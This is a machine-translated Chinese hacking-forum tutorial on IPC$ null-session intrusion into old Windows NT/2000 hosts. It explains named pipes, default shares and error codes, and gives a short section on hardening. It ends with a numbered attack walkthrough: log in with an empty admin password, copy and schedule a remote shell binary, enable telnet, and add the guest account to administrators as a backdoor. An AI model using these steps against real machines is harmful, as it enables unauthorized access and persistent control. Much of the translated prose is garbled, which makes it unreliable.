I am a bit: online about IPC $ invading can be described as cow, and there is no shortage, and the attack step can even say that it has become a classic model. Therefore, no one is willing to take this a set of things. But though this, but I personally think that these articles are not detailed. For the first time I contact IPC $ rookie, simple Russen steps don't answer their confused (you just find a HACK forum to search. IPC, how much is the existence of doubts). So I wrote this tutorial that is equivalent to the solution. I want to make some easier confusion, it is easy to confuse the question, let everyone don't always be in the same place! If you finish this There is still questions about the posts, please reply right away!
II: IPC $ IPC $ (Internet Process Connection) is a shared "named pipe" resource (everyone saying this), is to make the name of the name and password can be obtained by verifying the username and password Permissions, use when managing computers and views computer shared resources. With IPC $, the connectors can even create an empty connection with the target host without the username and password (of course, the other machine must open IPC $ sharing, otherwise you can't connect), and use this empty connection, The connector can also get a list of users on the target host (but the responsible administrator will prohibit the export user list). We are always talking about IPC $ vulnerability IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, it is to facilitate administrator's remote management and open remote network login function, but also open the default sharing, ie all Logic disk (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $). All of these, the original intention is to facilitate the management of the administrator, but the original intention does not necessarily have a good job, some don't have the heart (what is intention? I don't know, the pronoun is one) will take advantage of IPC $, access sharing Resources, export users list, and use some dictionary tools to perform password probing, hoped to achieve higher permissions, thereby achieving non-marketed purposes.
Square:
1) IPC connection is a remote network login function unique in Windows NT and above, which is equivalent to Telnet in UNIX, because IPC $ features need to use a lot of DLL functions in Windows NT, so you can't be in Windows 9.x. run. That is to say, only NT / 2000 / XP can be established IPC $ connection, 98 / ME can't create IPC $ Connection (but some friends said to build an empty connection in 98, I don't know if it is true, but now 2003 Year, I suggest that 98 comrades change the system, 98 is not cool)
2) Even if the empty connection is not 100% can be established, if the other party closes IPC $ sharing, you still have no connection.
3) It is not to say that you can view the other party's list of users, as administrators can prohibit export users.
Three establishment IPC $ Connection in the HACK attack is like what is said above, even if you have established an empty connection, you can also get a lot of information (and this information is often essential), visit Part of sharing, if you can log in as a user with certain permissions, then you will get the appropriate permissions, obviously if you log in as an administrator, 嘿嘿, don't have to say more, what U Want, u can do !! (Basically, you can get the target information, manage the target process and service, upload the Trojan and run, if it is 2000 Server, you can also consider opening the terminal service convenient control. How? Enough!) But You shouldn't be happy too early, because the administrator's password is not so good, although there will be some silly administrators with empty password or a mentally password, but this is a few, and now it is not in the past, with the past People's safety awareness is increased, and the administrators are more careful. It will be harder and harder to get the administrator's password: (So your biggest possibility is to connect with minimal permissions or even no permissions, you will slowly It is found that IPC $ is not universal, even when the host does not turn on IPC $ sharing, you can't connect. So I think you don't want to invade IPC $ invading as an ultimate weapon, don't think it's a battle, it is like It is the passball before the football field, rarely has a fatal effect, but it is indispensable, I think this is the meaning of IPC $ connected in the Hack invasion.
Four IPC $ with empty connections, 139, 445 ports, the default sharing relationship The above relationship may be a problem with the rookie very confused, but most of the articles do not have a special statement, in fact, I understand is not very thorough, all Summary in communication with everyone. (A BBS with a good discussion) 1) 1) IPC $ with empty connections: No user name and password IPC $ connection is empty, once you The identity of a user or administrator (ie, IPC $ connection with a specific username and password), naturally can't be called empty connection. Many people may have to ask, since it can be connected, then I will open it later. Why didn't I expell the weak password, huh, huh, I mentioned before, when you log in in an empty connection, you don't have any permissions (very depressed), and you or administrators When you log in, you will have the appropriate permissions (who don't want to have permission, so you still have a real man, don't be lazy).
2) IPC $ with 139,445 port: IPC $ connection can be remotely logged in and access to default sharing; and 139 ports are enabled by NetBIOS protocols, we can implement access to shared files / printers through 139,445 (Win2000) ports. Therefore, in general, IPC $ is supported by 139 or 445 ports.
3) IPC $ and the default sharing default sharing is to make it easy for administrators remote management and the default open share (you can of course turn off it), that is, all logical disks (C $, D $, E $ ...) and system catalog Winnt Or Windows (admin $), we can implement access to these default sharing through the IPC $ connection (provided that the other party did not close these default sharing)
The five reasons for the fans of the five IPC $ are more common:
1) Your system is not NT or more operating system;
2) The other party does not open IPC $ default sharing
3) The other party has not opened 139 or 445 port (puzzled firewall shield)
4) Your command input is incorrect (such as lack of space, etc.)
5) Username or password error (empty connection is of course, it doesn't matter). Error number 51, Windows can't find network path: network has problems; error number 53, no network path: IP address error; target LANMANSERVER service is not started; the target has firewall (port filtering); error number 67, I can't find the network name: Your LanmanWorkStation service is not started; the target deletes IPC $; error number 1219, the information provided with the existing credentials: You have already established an IPC $ with the other party, please delete. Error number 1326, unknown user name or error password: The reason is obvious; error number 1792, trying to log in, but network login service is not started: The target Netlogon service is not started. (This condition will appear in connection domain) Error number 2242, this user's password has expired: the target has an account policy, enforces the change in periodic requirements. Regarding IPC $, there is a more complex problem. In addition to the above reasons, there will be some other uncertain factors, and this person cannot be detailed, it depends on everyone to experience and experiment.
If the IPC $ IPC $ (this paragraph is from related articles) first you need to get a shell that does not rely on IPC $, such as SQL CMD extension, Telnet, Trojan, of course, this shell must be admin privilege, then you You can use the shell to execute the NET Share IPC $ to open the target IPC $. From above, IPC $ can use there much of use. Please confirm that the relevant services have been running. If you don't start it (don't know how to do it, please see the usage of the NET command), or if you don't work (such as a firewall, killing) It is recommended to give up.
Seven how to prevent IPC $ invading
1 Prohibition of empty connections (This operation does not prevent the establishment of the empty connection, leading from "Empty Fair in Win2000") first running regedit, find the following group [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / LSA] put restrictanonymous = DWORD key value is changed to: 00000001 (If set to 2, there are some problems that will happen, such as some WIN service problems, etc.) 2 Prohibit the default sharing
1) Look at the local shared resource run - CMD- Enter Net Share
2) Delete sharing (one entered one) NET Share IPC $ / delete net share admin $ / delete net Share C $ / Delete Net Share D $ / Delete (if there is e, f, ... can continue to delete)
3) Stop Server Service Net Stop Server / Y (Re-enable the Server service will be reopened)
4) Modify the registry Run -Regedit Server version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShareserver (DWORD) to: 00000000. Pro version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShaRewks (DWORD) to: 00000000. If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value.
3 Permanently close IPC $ and Default Shared Related Services: LanmanServer, Server Server Service Control Panel - Administrative Tool - Services - Find Server Services (right-click) - Properties - General - Startup Type - Disabled
4 Install the firewall (check related settings), or port filtering (filtered out 139, 445, etc.), or use the new version of the optimization master
5 Set complex password to prevent password passwords via IPC $ (this tutorial is not updated regularly, please visit the official website: Vegetable Bird Community Original http://ccbirds.yeah.net)
Eight related orders
1) Establish an empty connection: NET USE // IP / IPC $ "" / user: "" (must pay attention to: this line of commands contain 3 spaces)
2) Establish a non-empty connection: NET USE // IP / IPC $ "User Name" / User: "Password" (same as 3 spaces)
3) Mapping Default Sharing: NET USE Z: // IP / C $ "Password" / user: "User Name" (you can map the other party C disk to your own Z disk, other disk classes) If you have established with your goals IPC $, you can directly use IP drive letter $ access, specific command NET USE Z: // IP / C $
4) Delete an IPC $ / DEL 5) Remove the shared mapping NET USE C: / DEL to delete the map of the map, other disk classes push net use * / del delete, there will be prompt requirements Y confirmation
The invasion mode is too classic, and most of the IPC tutorials have introduced. I will take it to the original creator! (I don't know which seniors are you)
1. C: /> NET USE ///127.0.0.1/IPC $ "" / user: "admin", the user name sweeping to "streamer" is Administrators, the password is the IP address of "empty" (empty password? Wow, luck is good at home), if you are intended to attack, you can use such a command to build a connection with 127.0.0.1, because the password is "empty", so the first quotation is not entered, after a double quotes The user name, enter the administrators, and the command can be successfully completed. 2. C: /> Copy Srv.exe //127.0.0.1/admin $ Copy SRV.EXE first, there is in the direction of the Tools directory ($ refers to the admin user's C: / WinNT / System32 /, You can also use C $, D $, meaning the C disk and D disk, see where you want to copy it).
3. C: /> Net Time //127.0.0.1 Investigation Time, found 127.0.0.1 The current time of 127.0.0.1 is 2002/3/19 11:00 am, and the command successfully completed.
4. C: /> at //127.0.0.1 11:05 srv.exe launches SRV.exe with the AT command (the time set here is more than the host time, or how you start, huh, huh!)
5. C: /> Net Time //127.0.0.1 Check time no time? If the current time of 127.0.0.1 is 2002/3/19 11:05 am, then prepare to start the following command.
6. C: /> Telnet 127.0.0.1 99 This will use the telnet command, pay attention to the port is 99. The Telnet default is the 23-port, but we use SRV to create a 99-port for us in the other party. Although we can go on Telnet, SRV is a one-time, and then activated next time! So we intend to build a Telnet service! This is to use NTLM.
7.c: /> Copy ntlm.exe //127.0.0.1/admin $ Upload NTLM.exe to the host with a copy command (NTLM.exe is also in the "stream" Tools directory).
8. C: / Winnt / System32> NTLM Enter NTLM Start (here C: / Winnt / System32> refers to the other party, running NTLM actually let this program run on the other computer). When "DONE" appears, it will be normal. Then use "Net Start Telnet" to open the Telnet service!
9. Telnet 127.0.0.1, then enter the username and password to enter the other party, the operation is just as simple as the operation on DOS! (And then do you want to do? What do you want to do, haha? In order to prevent everyone, we will add guest to the management group.
10. C: /> NET User Guest / Active: YES activates the other party guest user
11. C: /> Net user guest 1234 change the password of the guest to 1234, or the password you want to set
12. C: /> Net localgroup administrators Guest / add Least into administrator ^ _ ^ (if the admin password changes, the guest account has not changed, the next time we can use Guest to access this computer again)
